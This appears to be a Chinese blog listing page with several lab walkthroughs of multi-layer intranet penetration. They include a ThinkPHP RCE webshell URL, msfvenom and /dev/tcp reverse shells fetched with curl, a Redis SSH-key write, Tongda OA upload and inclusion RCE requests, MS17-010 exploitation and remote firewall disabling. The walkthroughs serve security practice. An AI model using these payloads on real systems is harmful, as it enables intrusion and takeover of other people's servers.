精华内容
下载资源
问答
  • 2021-07-06 11:05:22

    0x00 环境搭建

    本身作者环境已经部署完成,只需要更改IP地址及服务策略即可正常使用。原文地址公众号teamssix,回复cfs即可。

    在这里插入图片描述
    我这里将操作时将环境做了一定调整,将Target 1Vmnet1网卡改成了VMnet8,其余的保持不变,另外还需要在Target 1的宝塔面板中加入对应的IP地址
    在这里插入图片描述
    另外如果靶机开机时没有IP地址,也需要自己手动将IP地址配置完成,确保攻击环境和Targert 1能通信,Target 2可以和Target 1Target 3可以相互通信。


    0x01 Target 1

    直接访问目标,为ThinkPHP v5.0
    在这里插入图片描述
    EXP直接打就行,/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=system("echo '<?php @eval(\$_POST[1]);?>' > 111.php");
    在这里插入图片描述
    成功拿到shell,使用菜刀连上
    在这里插入图片描述
    因为php7以上的版本,所以正常菜刀连不上,这里我用的CKnife,如果连不上的可以使用蚁剑。

    接下来制作马让它在MSF中上线msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.181.240 lport=8888 -f elf > c7.elf
    在这里插入图片描述
    接着尝试提权。。。哎,失败了,centos 7提权真的麻烦,有几个exp在本机环境复现ok,到了这个环境里面就无法提权了,暂时先放放,恶心坏了。


    0x02 Target 2

    拿下Target 1权限后,先配置去往Target 2的路由
    在这里插入图片描述
    查看路由是否配置成功
    在这里插入图片描述
    通过设置socks,访问Target2

    msf6 > use auxiliary/server/
    msf6 auxiliary(server/socks_proxy) > show options 
    
    Module options (auxiliary/server/socks_proxy):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       PASSWORD                   no        Proxy password for SOCKS5 listener
       SRVHOST   0.0.0.0          yes       The address to listen on
       SRVPORT   1080             yes       The port to listen on
       USERNAME                   no        Proxy username for SOCKS5 listener
       VERSION   5                yes       The SOCKS version to use (Accepted: 4a, 5)
    
    
    Auxiliary action:
    
       Name   Description
       ----   -----------
       Proxy  Run a SOCKS proxy server
    
    
    msf6 auxiliary(server/socks_proxy) > set version 4a
    version => 4a
    msf6 auxiliary(server/socks_proxy) > exploit 
    [*] Auxiliary module running as background job 1.
    

    此时可以通过配置/etc/proxychans.conf,可以使kali对应的流量通过session转发至Target 2
    在这里插入图片描述
    通过proxychains命令执行nmap,等待扫描结果完成,时间较长,也可以直接扫靶机

    root@kali191a:~# proxychains nmap -Pn -sT 192.168.22.0/24 -p 22,80 --open
    ProxyChains-3.1 (http://proxychains.sf.net)
    Starting Nmap 7.70 ( https://nmap.org ) at 2021-07-06 03:37 EDT
    
    Nmap scan report for 192.168.22.22
    Host is up (0.033s latency).
    
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    ......
    

    接着在浏览器在设置socks代理,访问Target 2
    在这里插入图片描述
    直接访问就可以成功
    在这里插入图片描述
    这里作者给了一个提示,按F12审计时可以看到
    在这里插入图片描述
    单引号直接报错
    在这里插入图片描述
    经过一翻手工注入,拿到用户名密码为admin/123qwe
    在这里插入图片描述
    登陆后台,通过百度搜索cms得知后台为admini,使用r=进行传参找到后台
    在这里插入图片描述
    进入后台后,通过模板进行getshell
    在这里插入图片描述
    尝试访问
    在这里插入图片描述
    接着使用sockscap软件将菜刀软件进行代理转发,菜刀即可连接成功,或者使用蚁剑直接设置代理也可以。
    在这里插入图片描述
    接下来再次制作msf马,使其上线至msf,这次由于目标在内网,所以需要使用bind_tcp正向连接,msfvenom -p linux/x64/meterpreter/bind_tcp lport=4567 -f elf > uu.elf

    接着将马传入菜刀中,运行即可(这里有一点需要注意,菜刀通过socks时连接断断续续的,原因未知,但是不影响传马)
    在这里插入图片描述
    成功在msf上线,接着使用CVE-2021-3493提权
    在这里插入图片描述
    成功获取root权限


    0x03 Target 3

    在获取第二台主机权限后,继续扫描内网信息,添加路由,获取内网主机信息。
    在这里插入图片描述
    放部分关键命令,proxychains nmap -Pn -sT 192.168.33.33 --open
    在这里插入图片描述
    445端口,上永恒之蓝,但是发现无法接连到shell,于是使用另外一个模块admin/smb/ms17_010_command

    msf6 > use auxiliary/admin/smb/ms17_010_command
    msf6 auxiliary(admin/smb/ms17_010_command) > set command whoami
    command => whoami
    msf6 auxiliary(admin/smb/ms17_010_command) > exploit 
    
    [*] 192.168.33.33:445     - Target OS: Windows 7 Ultimate 7601 Service Pack 1
    [*] 192.168.33.33:445     - Built a write-what-where primitive...
    [+] 192.168.33.33:445     - Overwrite complete... SYSTEM session obtained!
    [+] 192.168.33.33:445     - Service start timed out, OK if running a command or non-service executable...
    [*] 192.168.33.33:445     - Getting the command output...
    [*] 192.168.33.33:445     - Executing cleanup...
    [+] 192.168.33.33:445     - Cleanup was successful
    [+] 192.168.33.33:445     - Command completed successfully!
    [*] 192.168.33.33:445     - Output for "whoami":
    
    nt authority\system
    
    
    [*] 192.168.33.33:445     - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf6 auxiliary(admin/smb/ms17_010_command) > 
    

    成功看到可以成功执行命令。

    当然为了更好的解决问题,测试后发现,重新使用proxychains再开启一个msfconsole即可利用ms17-010成功(这里反复多测试了几次后发现,似乎不太稳定,时行时不行)。

    暂时先这样吧,Centos7提权留待以后再弄

    更多相关内容
  • 三层网络靶场搭建&MSF内网渗透

    千次阅读 2022-02-09 10:44:49
    三层网络靶场搭建&MSF内网渗透 在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多层网络的练习环境。本文通过VMware搭建3层网络,并通过...

    三层网络靶场搭建&MSF内网渗透

    在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多层网络的练习环境。本文通过VMware搭建3层网络,并通过msf进行内网渗透,涉及代理搭建,流量转发,端口映射等常见内网渗透技术。

    网络拓扑

    图片

    环境搭建

    首先在虚拟机中新建3块网卡,选择仅主机模式

    图片

    将kali设为第一层网络vmnet1

    图片

    将第一层靶机设为双网卡vmnet1和vmnet2

    图片

    图片

    将第二层靶机设置为双网卡:vmnet2和vmnet3:

    图片

    图片

    将第三层靶机设为vmnet3:

    图片

    至此,我们的3层网络环境就已经搭建完毕。

    第一层靶机

    Nmap探测一下,发现8080端口:

    图片

    访问一下:

    图片

    返现文件上传点,经测试没有任何过滤,可以直接上传任意文件,因此直接上传jsp一句话后门:

    图片

    上传后返回文件路径,菜刀连接:

    图片

    为了进一步做内网渗透,上传msf后门:

    1、后门制作:

    msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.59.128 LPORT=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf >shell.elf
    

    将shell.elf上传到第一层靶机192.168.59.129

    2、MSF设置监听:

    图片

    3、在第一层靶机运行shell.elf

    Chmod 777 shell.elf
    ./shell.elf

    4、Msf获得meterpreter,执行shell,查看网络配置,发现双网卡,第二层网络段为192.168.80.0/24

    图片

    第二层靶机

    首先利用第一层的meterpreter添加到第二层的路由:

    run autoroute -s 192.168.80.0/24
    

    图片

    然后利用msf进行第二层网络存活主机扫描:

    use auxiliary/scanner/discovery/arp_sweep

    图片

    发现第二层靶机 192.168.80.129。

    接着利用msf搭建socks代理,好让攻击机直接打第二层网络:

    use auxiliary/server/socks4a

    图片

    然后在第一层网络配置相关socks4代理客户端:

    Proxychain:

    在配置文件/etc/proxychains.conf中添加:

    socks4 192.168.59.128 9999

    然后利用proxychans 启动nmap对第二层靶机进行扫描,这里注意一定要加上-Pn和-sT参数:

    proxychains nmap -Pn -sT 192.168.80.129 -p1-1000

    图片

    发现第二层主机开放22和80端口。

    在Chrome中配置代理

    图片

    访问第二层网络:

    图片

    是一个typecho的 cms,尝试admin/admin等弱口令登陆后台,登陆成功:

    图片

    个人信息处发现flag:

    图片

    在设置中允许上传php

    图片

    然后撰写文章,附件上传php webshell:

    图片

    可以看到shell路径,用蚁剑连接,因为是第二层网络,所以得通过socks代理客户端去启动蚁剑,我用的是sockscap64:

    图片

    在代理中配置代理服务器:

    图片

    用蚁剑连接shell:

    图片

    在网站根目录处发现flag

    查看config.inc.php:

    图片

    发现数据库口令123:

    将数据库dump出来:

    mysqldump -uroot -p123 typecho >/tmp/1.sql

    在1.sql中发现flag:

    图片

    第二层靶机还开放了22端口,尝试利用msf、hydra探测一下弱口令:

    Hydra:

    图片

    Msf:

    use auxiliary/scanner/ssh/ssh_login

    图片

    图片

    同样发现弱口令,同时msf可以直接获得一个meterpreter

    图片

    获得flag:

    图片

    在sockscap64中打开ssh客户端:

    图片

    也可以利用root/123456登录,获得flag

    图片

    同样,为了打进第三层,我们需要在第二层靶机上上传msf后门,

    制作后门:

    msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=4321 -f elf > shell1.elf

    利用蚁剑上传,并在第二层靶机运行:

    Chmod 777 ./shell1.elf
    ./shell1.elf

    在msf上配置payload:

    图片

    获得第二层meterpreter:

    图片

    发现第三层网段192.168.226.0/24

    图片

    然后利用这个meterpreter添加到第三层的网络路由:

    run autoroute -s 192.168.226.0/24

    图片

    在启用一个socks代理给第三层网络,端口开9998

    img

    然后在proxychains的配置文件中加上9998:

    图片

    扫描一下第三层主机端口:

    proxychains nmap -Pn -sT 192.168.226.129 -p 1-1000

    图片

    发现开放了80、445端口

    第三层网络

    在chrome 修改代理,端口改为9998

    图片

    访问第三层网络

    图片

    查询处存在SQL注入

    图片

    抓包:

    图片

    Proxychains 跑sqlmap

    proxychains sqlmap -r test.txt

    图片

    得到后台用户密码:admin/faka123

    图片

    登录:

    图片

    发现flag。接着在logo上传处发现任意文件上传:

    图片

    直接上传木马,获得路径:

    图片

    菜刀连接,网站根目录发现flag

    图片

    发现网站开启了3389,同时是system权限:

    图片

    图片

    直接修改administrator密码:

    net user administrator 123456

    再把第三层3389流量转发到代理服务器中:

    图片

    访问远程桌面:

    图片

    发现flag:

    图片

    同时,该靶机开放445端口,试试永痕之蓝:

    图片

    图片

    同样可以拿到shell。

    至此,我们已经拿下3层网络中的全部机器。

    转载自:
    https://mp.weixin.qq.com/s/EYWsERo66JAutay94Ygftg

    展开全文
  • https://blog.csdn.net/szgyunyun/article/details/107104288 cs上线192.168.52.30 进程迁移 第三层网络渗透内网) 信息搜集192.168.52.30 ipconfig /all # 查看本机ip,所在域 route print # 打印路由信息 ...

    环境搭建

    在这里插入图片描述

    配置虚拟机网卡

    在Vmware中新增两个虚拟网卡VMnet8、VMnet14。VMnet8设为默认的NAT模式,IP段设为192.168.52.0/24;VMnet14设为仅主机模式,IP段设为192.168.93.0/24

    环境信息

    DMZ区的 Ubuntu 需要启动redis和nginx服务:
    
    sudo redis-server /etc/redis.conf
    
    sudo /usr/sbin/nginx -c /etc/nginx/nginx.conf
    
    sudo iptables -F
    
    第二层网络的 Ubuntu需要启动docker容器:
    
    sudo service docker start
    
    sudo docker start 8e172820ac78
    
    第三层网络的 Windows 7 (PC 1)需要启动通达OA:
    
    C:\MYOA\bin\AutoConfig.exe
    
    
    域用户信息
    域用户账户和密码如下:
    
    Administrator:Whoami2021
    
    whoami:Whoami2021
    
    bunny:Bunny2021
    
    moretz:Moretz2021
    
    Ubuntu 1:
    
    web:web2021
    
    Ubuntu 2:
    
    ubuntu:ubuntu
    
    通达OA账户:
    
    admin:admin657260
    

    外网打点

    信息搜集

    现在对http://192.168.3.123/地址进行黑盒测试
    首先使用nmap对地址进行扫描

    nmap -T4 -sC -sV 192.168.3.123 -p 1-65535
    

    在这里插入图片描述
    查看81端口
    在这里插入图片描述

    利用exp getshell

    https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP
    在这里插入图片描述

    cat /proc/1/cgroup
    

    发现是docker环境
    在这里插入图片描述

    反弹shell

    先把shell反弹到我们的kali当中(因为是ubuntu所以不能直接反弹shell)
    kali上写个shell.sh
    在这里插入图片描述

    bash -i >& /dev/tcp/192.168.31.96/6666 0>&1
    

    再开个web服务

    python -m http.server 80
    

    kali监听一个端口

    nc -lvvp 6666
    

    在这里插入图片描述
    看一下靶机能不能访问192.168.3.139:80
    在shell管理系统

    curl 192.168.3.139/shell.sh
    

    在这里插入图片描述
    然后执行一下

    curl 192.168.3.139:80/shell.sh|bash
    

    在这里插入图片描述
    成功把shell反弹到了kali上面

    提权(失败)

    查看linux版本

    uname -a
    

    在这里插入图片描述
    提权exp

    https://github.com/Al1ex/LinuxEelvation
    

    没成功

    提权(成功)

    find / -perm -u=s -type f 2>/dev/null
    

    在这里插入图片描述
    利用/home/jobs/shell 提权,发现shell文件执行了ps,我们利用ps提权,写ps恶意命令

    cd /tmp
    echo "/bin/bash" > ps
    chmod 777 ps
    echo $PATH
    export PATH=/tmp:$PATH # 将/tmp添加到环境变量中,并且先加载执行/tmp里的程序
    cd /home/jobs
    ./shell
    

    在这里插入图片描述
    已经是root权限

    msf上线

    生成msf木马

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.3.139 LPORT=6667 -f elf > shell.elf
    

    监听(msf端执行)

    use exploit/multi/handler
    set lhost 192.168.3.139
    set lport 6667
    set payload linux/x86/meterpreter/reverse_tcp
    run
    

    在这里插入图片描述

    将木马传到靶机

    wget http://192.168.3.139/shell.elf
    chmod 777 shell.elf
    ./shell.elf
    

    在这里插入图片描述

    docker逃逸(失败,139主机只拿下了一半)

    一直逃逸不出来,看看其他方式

    redis未授权访问

    信息搜集可得,服务器还有个redis端口,曲线救国

    https://github.com/qishibo/AnotherRedisDesktopManager/releases/tag/v1.5.1
    
    wget http://download.redis.io/redis-stable.tar.gz
    tar -zxvf redis-stable.tar.gz
    cd redis-stable 
    make //全局生效 
    cp src/redis-cli /usr/bin/
    
    redis-cli -h 192.168.3.123
    

    在这里插入图片描述
    redis未授权确定了

    kali生成ssh公钥

    ssh-keygen -t rsa
    

    将公钥导入key.txt文件(前后用\n换行,避免和Redis里其他缓存数据混合),再把key.txt文件内容写入目标主机的redis缓冲里:

    (echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > key.txt
    cat key.txt | redis-cli -h 192.168.31.132 -x set xxx
    

    在这里插入图片描述
    进入redis命令行将公钥写入(这里redis要是不用root启,就不行)

    config set dir /root/.ssh    # 设置redis的备份路径为/root/.ssh/
    config set dbfilename authorized_keys    # 设置保存文件名为authorized_keys
    save    # 将数据保存在目标服务器硬盘上
    

    第二层网络渗透

    成功拿下“192.168.3.123”,进一步进行信息搜集

    在这里插入图片描述
    到这里我们可以发现我们拿下了第一台机器是ubuntu18 有两个网卡,发现了第一个内网网段是192.168.52.10

    msf上线ubuntu18(192.168.3.123)

    参考前面,懒得写了
    在这里插入图片描述
    工具使用一定要熟练啊,上线我就上了半天,设置监听端口之前一定看看占用了没,气死我了!!!!!!

    msf扫描192.168.52.10/24

    传一个fscan上去

    upload /home/yezi/hongri1/fscan_amd64
    

    然后扫描
    在这里插入图片描述
    扫到一台192.168.52.30
    通达OA
    使用frp在192.168.52.10做一个代理,来渗透192.168.52.30

    frp教程
    https://www.cnblogs.com/hanlongyi/p/15250440.html
    

    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

    第二次网络横向移动

    渗透192.168.52.30(通达OA)

    全局代理抓不到包,在bp上挂一个代理
    在这里插入图片描述

    判断通达OA版本

    TongDaOA.domain/inc/expired.php 判断通达版本
    
    参考:https://github.com/OA-HUNTER/TongDa-OA
    

    在这里插入图片描述
    可以看到版本为11.3

    任意用户登录漏洞+RCE漏洞

    登陆处抓包
    在这里插入图片描述

    2)修改再发包
    需修改以下三个地方:
    /logincheck.php      /logincheck_code.php
    删除cookie在post包中添加UID=1
    

    在这里插入图片描述
    用获取的PHPSESSID访问/general/

    访问上传接口抓包

    /ispirit/im/upload.php
    

    修改包的内容

    POST /ispirit/im/upload.php HTTP/1.1
    Host: 192.168.52.30:8080
    Content-Length: 658
    Cache-Control: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
    Accept: */*
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
    Cookie: PHPSESSID=123
    Connection: close
    
    ------WebKitFormBoundarypyfBh1YB4pV8McGB
    Content-Disposition: form-data; name="UPLOAD_MODE"
    
    2
    ------WebKitFormBoundarypyfBh1YB4pV8McGB
    Content-Disposition: form-data; name="P"
    
    123
    ------WebKitFormBoundarypyfBh1YB4pV8McGB
    Content-Disposition: form-data; name="DEST_UID"
    
    1
    ------WebKitFormBoundarypyfBh1YB4pV8McGB
    Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
    Content-Type: image/jpeg
    
    <?php
    $command=$_POST['cmd'];
    $wsh = new COM('WScript.shell');
    $exec = $wsh->exec("cmd /c ".$command);
    $stdout = $exec->StdOut();
    $stroutput = $stdout->ReadAll();
    echo $stroutput;
    ?>
    ------WebKitFormBoundarypyfBh1YB4pV8McGB--
    
    

    在这里插入图片描述
    图片马的路径

    2204/1828100034.jpg
    

    文件包含rce

    POST /ispirit/interface/gateway.php HTTP/1.1
    Host: 192.168.52.30:8080
    Connection: keep-alive
    Accept-Encoding: gzip, deflate
    Accept: */*
    User-Agent: python-requests/2.21.0
    Content-Length: 90
    Content-Type: application/x-www-form-urlencoded
    
    json={"url":"/general/../../attach/im/2204/1828100034.jpg"}&cmd=whoami
    
    
    

    在这里插入图片描述

    参考资料
    https://blog.csdn.net/szgyunyun/article/details/107104288
    

    cs上线192.168.52.30

    在这里插入图片描述

    进程迁移

    在这里插入图片描述

    第三层网络渗透(内网)

    信息搜集192.168.52.30

    ipconfig /all   # 查看本机ip,所在域
    route print     # 打印路由信息
    net view        # 查看局域网内其他主机名
    arp -a          # 查看arp缓存
    net start       # 查看开启了哪些服务
    net share       # 查看开启了哪些共享
    net share ipc$  # 开启ipc共享
    net share c$    # 开启c盘共享
    net use \\192.168.xx.xx\ipc$ "" /user:""    # 与192.168.xx.xx建立空连接
    net use \\192.168.xx.xx\c$ "密码" /user:"用户名"    # 建立c盘共享
    dir \\192.168.xx.xx\c$\user    # 查看192.168.xx.xx c盘user目录下的文件
    
    net config Workstation    # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
    net user                 # 查看本机用户列表
    net user /domain         # 查看域用户
    net localgroup administrators    # 查看本地管理员组(通常会有域用户)
    net view /domain         # 查看有几个域
    net user 用户名 /domain   # 获取指定域用户的信息
    net group /domain        # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
    net group 组名 /domain    # 查看域中某工作组
    net time /domain           // 主域服务器会同时作为时间服务器
    net group "domain admins" /domain  # 查看域管理员的名字
    net group "domain computers" /domain  # 查看域中的其他主机名
    net group "doamin controllers" /domain  # 查看域控制器(可能有多台)
    net group "Enterprise Admins" /domain    // 查看域管理员组
    

    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

    信息搜集后得到
    有一个域:whoamianony.org
    域控是:DC.whoamianony.org
    域控的ip:192.168.93.30
    

    在这里插入图片描述
    93这个网段有三台机器
    193.168.92.20(通达OA本机)
    193.168.92.30
    193.168.92.40

    抓一下凭证信息
    在这里插入图片描述

    横向移动

    关闭防火墙

    psexec失败了,半天没反应,我估计是防火墙的原因

    IPC$常用命令
    net use	查看当前连接的IPC$
    net use * /del	删除IPC$连接
    net use \192.168.1.1\ipc$ 密码 /user:域\账号	
    连接域内IP地址为192.168.1.1的主机
    dir \192.168.1.1\c$	列出连接的192.168.1.1的C盘文件
    copy c:/12.txt \192.168.1.1\c$\2.txt	
    复制本地c盘的12.txt文件到192.168.1.1的c盘并保存为2.txt
    

    那我们利用net use 把域控的防火墙关了

    net use \\192.168.93.30\ipc$ "Whoami2021" /user:"Administrator"
    
    sc \\192.168.93.30 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
    
    sc \\192.168.93.30 start unablefirewall
    

    psexe横向移动

    因为抓到了域控的账号密码,cs横向基本操作这里不谈了
    在这里插入图片描述
    好了,至此机器全部都上线了

    展开全文
  • 渗透测试之CFS三层靶机内网渗透

    千次阅读 2022-02-23 15:54:29
    target1网络配置: target2网络配置: target3网络配置: 3.web靶机搭建(宝塔面板启动) 启动命令: /etc/init.d/bt start 重启 /etc/init.d/bt restart 默认端口管理8888 环境搭建完 kali能...

    一、环境搭建:

    靶机拓扑:


     

    1.添加虚拟网卡:

    添加 22网段(VMnet2) 和 33(VMnet3)网段的网卡

    VMnet8为NAT模式与外部通信


    2.配置网卡:

    target1网络配置:

    target2网络配置:

    target3网络配置:

     3.web靶机搭建(宝塔面板启动)

    启动命令: /etc/init.d/bt start

    重启 /etc/init.d/bt restart

    默认端口管理8888

    环境搭建完 kali能ping通target1  target1能ping通target2   target2能ping通target3  三层网络关系

    二、渗透测试:

    信息收集:

    target1(thinkphp5搭建)

     使用nmap扫描端口

    nmap -sV -p 1-65535 -T4 192.168.234.178

    因为是thinkphp5  想到远程命令执行 (网上很多利用脚本自行选择 我用msf一把梭)

    search thinkphp                (查找可利用exp)
    use 0                          (选择exp)
    set rhosts 192.168.234.178     (目标target1的ip)
    set rport 80                   (目标target1的端口)
    set lhost 192.168.234.130      (shell接收ip 这里是kali本机ip)
    set lport 4444                 (shell接收端口)
    run                            (执行exp)
    

    执行返回一个shell  target1拿下


    信息收集

    getuid     
    sysinfo
    ifconfig

    查看ip发现两个ip (22网段是内网网段)

    使用msf添加路由

    run autoroute -s 192.168.22.0         添加22网段路由

    run autoroute -p                               查看路由

    已经添加路由,但是只有返回的这个shell能访问22网段内网靶机;

    使用sock4+proxychains4代理打通内网

    use auxiliary/server/socks_proxy 
    options
    set srvhost 192.168.234.130
    set version 4a

     

    还需要修改kali /etc/proxychains4.conf文件 (在最后一行添加) 

     

    代理下使用namp扫描 

    proxychains4 nmap -Pn -sT 192.168.22.0/24

    proxychains4 nmap -Pn -sT 192.168.22.129

     内网还有web 配置kali浏览器sock代理

     

     使用八哥CMS搭建

     使用gobuster扫描目录 (可以先手工测试,我直接使用工具偷懒,反而错过重要信息)

    proxychains4  gobuster dir -u http://192.168.22.129/    -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php 

    访问 robots.txt 发现目录  

     在index.php中发现sql注入提示

     手工报错注入

     爆数据库名:

    index.php?r=vul&keyword=1 ' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='bagecms'),1,32),0x7e),1)--+

    爆表名:

    index.php?r=vul&keyword=1'and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema="bagecms")),0x7e)) --+

    最后爆出数据: admin 123qwe

     

     md5解密后得到后台账号密码 admin 123qwe

    登录后台 http://url/index.php?r=admini/default/index

     内容模板写入shell

    使用AntSword设置代理连接shell

     

     信息收集 发现33网段

     因为是使用代理访问的22网段的shell 访问不到33网段 所以使用msf生成一个正向

    msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=4444 -f elf -o test.elf 

     将马子赋执行权限上传到webshell中 同时使用代理开启一个msf

    proxychains4 msfconsole 

    使用代理的msf开启监听

    use exploit/multi/handler                      使用监听模块
    set payload linux/x86/meterpreter/bind_tcp     设置payload
    set lport   4444                               设置接收端口与msfvenoms生成端口一致
    set rhost   192.168.22.129                     设置目标主机(target2)

     拿到 target2 shell


     添加33网段路由

     run autoroute -s 192.168.33.0/24

    run autoroute -p

     

     使用msf扫描模块扫描端口

    use auxiliary/scanner/portscan/tcp

     

     发现 192.168.33.33 主机并开放 445、3389  敏感端口

     msf尝试永恒之蓝

    use auxiliary/scanner/smb/smb_ms17_010     检测ms17010是否存在
    
    use exploit/windows/smb/ms17_010_psexe     利用ms17010

    使用ms17_010_psexe 提示执行成功,但是没有创建会话 (这里不是很明白)

    use auxiliary/admin/smb/ms17_010_command     这个exp可以执行命令


     至此三台靶机shell拿下了,后续还可以进行很多操作,比如windows提权和centos提权;

    展开全文
  • 三层网络渗透测试实验

    千次阅读 2019-10-21 20:17:51
    【第一】 目标ip:192.168.31.207 访问目标ip发现是一个文件上传页面 ... ...查看ip发现该主机是双网卡,第二层网络段为...为进一步进行内网渗透,我们上传msf后门 后门制作: msfvenom -p linux/x64/meterpreter...
  • 三层发现(网络层) 最常用ping命令,但是如果防火墙一开,就无法ping到对方。三层发现的优点在于,arping只能发现同一个网段的用户,而三层发现可以发现不同网段但是互联的用户 fping -a 存活主机 -b ...
  • 很久没有写点东西了,这次分享个二层内网的渗透过程,该内网约150台设备,工作组环境。 目录: 01外部打点 02边界突破 03内网渗透-信息收集 04内网渗透-拿下资产 01外部打点 入口点起源于弱口令+上传漏洞 当拿到...
  • 最近在研究内网写个博客来记录一下 这个东西关键在于的是msf代理设置,msf老版本的代理与新版本代理是不一样的,我的是msf6。 关键在于代理的设置,在实战上这个情况还是非常容易遇到的 环境搭建 靶机环境下载: 链接...
  • 一个实验了解多层内网渗透

    千次阅读 2020-11-03 10:30:15
    原创:锦行安全平台部zy 近年来,攻击者潜伏在企业内网进行攻击的安全事件屡见不鲜,攻击者在经常会企业的内网进行横向渗透,令防守方防不胜防。因此,我们应该严格控制好网络...第三层靶机 (内网办公机) : win7 用三层
  • 内网渗透工具

    千次阅读 2022-03-09 09:30:44
    一、内网渗透常见知识讲解 网络环境问题: 内外网简单判断 内网渗透中常见的几个问题有哪些呢? 防火墙穿透、木马免杀穿透、内网信息收集及定位。 内网渗透的一些工具和平台 渗透测试平台类: Metasploit ...
  • 内网渗透综述

    千次阅读 2021-12-01 23:25:29
    内网渗透基本流程 一、什么是内网渗透 内网是一个只有组织工作人员才能访问的专用网络,简而言之就是不可简单地通过外部公网ip进行访问到的公司内部网络。对于一个大型公司的网络系统,通过信息收集找到网站...
  • 使用Docker 快速 搭建CFS三层内网渗透靶场
  • 0X01 设置张独立网卡简单的网路拓扑图0X02 按照上面的网络拓扑图设置IP0X03 实验背景:已经拿下Ubuntu的webshell的情况下进行进入会话,查看网络环境,发现还有个网段地址 192.168.220.0/240X04 第二层网络探索...
  • 内网渗透 | 手把手教你如何进行内网渗透

    万次阅读 多人点赞 2020-11-23 21:33:36
    内网渗透 | 手把手教你如何进行内网渗透 目录 ...0x4 第三层内网渗透 0x5 总结 0x5.1 跳板总结 0x5.2 内网探测 0x5.3 后话 0x01 DMZ渗透 首页 看到DMZ开启了web服务,是一个typec...
  • 内网渗透,从字面上理解便是对目标服务器所在内网进行渗透并最终获取域控权限的一种渗透。内网渗透的前提需要获取一个Webshell,可以是低权限的Webshell,因为可以通过提权获取高权限。 在进行内网渗透之前需要了解...
  • 内网渗透基础总结

    2022-01-06 13:10:36
    渗透测试过程中我们一般把因特网称为外网,而将其余的网络(政务网、公安网、企业内网等)定义为内网。后来我仔细思考了一下,内外网的概念其实是相对而言的,比如一台电脑同处于办公室内的小型局域网和公司的大型...
  • 内网渗透-完整的域渗透

    千次阅读 多人点赞 2021-11-28 10:40:41
    用户加入域域渗透常规信息收集内网信息收集拿下20031.MySQL弱口令2.哈希传递攻击拿下域控信息收集mimikatz后渗透&其他MSF其他模块推荐阅读: 域环境 在开始域渗透之前,先来简单了解下域的一些概念 概念 域 域...
  • 内网渗透--总结

    2022-05-08 23:35:25
    内网渗透–总结 前言 记录一个月来对内网渗透的学习总结,内网渗透提前是我们已经通过各种手段拿到内网中某一台可以通向外网的服务器或主机的权限,然后把此当作跳板,内网渗透的目的是拿到DC域控制器的权限,达到...
  • 内网学习笔记
  • 内网渗透 信息收集

    千次阅读 2022-04-03 19:26:01
    文章目录一、收集对象二、内网主机的基本信息网络信息收集四、用户信息收集五、凭据信息收集六、后续的探针信息 一、收集对象 (1)内网主机的基本信息(版本,补丁,服务,任务,防护…), (2)网络信息...
  • 在普通网络环境下,可直接通过跳板机访问内网特定资源。 1.1 跳板机存在公网IP 1.1.1 网络环境 目标主机(公网IP:1.1.1.1,可访问特定内网资源)(跳板机) 1.1.2 使用方法 目标主机(公网IP:1.1.1.1,可访问特定...
  • 内网渗透学习(一)

    千次阅读 2022-03-27 09:53:50
    内网的一些组件和架构
  • 三层网络防护的域渗透

    千次阅读 2022-01-07 18:58:19
    目录环境准备网络拓扑配置网卡网络联通性测试一些账号绑定host...3389关闭防护内网主机发现配置路由配置socks攻击内网OA系统端口扫描getshell信息收集网络信息通网情况服务信息进程信息端口信息系统信息用户信息小结
  • 1、网络搭建: kali ping同Target1 Target2 ping同Target3 Target1 Target2 Target3 默认密码 teamssix.com 2、宝塔搭建 启动命令: /etc/init.d/bt start 重启 /etc/init.d/bt restart 默认端口管理8888 ...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 2,421
精华内容 968
关键字:

三层网络内网渗透